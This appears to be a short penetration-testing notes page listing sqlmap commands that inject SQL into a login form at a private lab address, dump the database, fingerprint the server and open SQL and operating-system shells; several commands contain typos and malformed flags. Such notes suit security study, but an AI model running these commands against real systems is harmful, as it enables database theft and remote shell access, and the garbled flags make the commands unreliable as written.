sqlmap

sqlmap -u "http://?id=login" --data="user=abcd&pass=abcd&submit=Login" --level=5 --risk=3 --dbms=mysql

sqlmap using login.rqst

sqlmap -u “http://192.168.0.115/checklogin.php” --data="myusername=&mypassword= Login=Submit " -p mypassowrd --level=3 --risk=3 -dbms=mysql --dump

sqlmap -u “http://192.168.0.115/checklogin.php” --data="myusername=&mypassword= Login=Submit " -p mypassowrd --batch -v O --fingerprint --banner --current-db --curent-user --is-dba

O --sql-shell gives you sql shell

O --os-shell

PreviousSQL Injection Nextmysql syntax

Last updated 3 years ago

Was this helpful?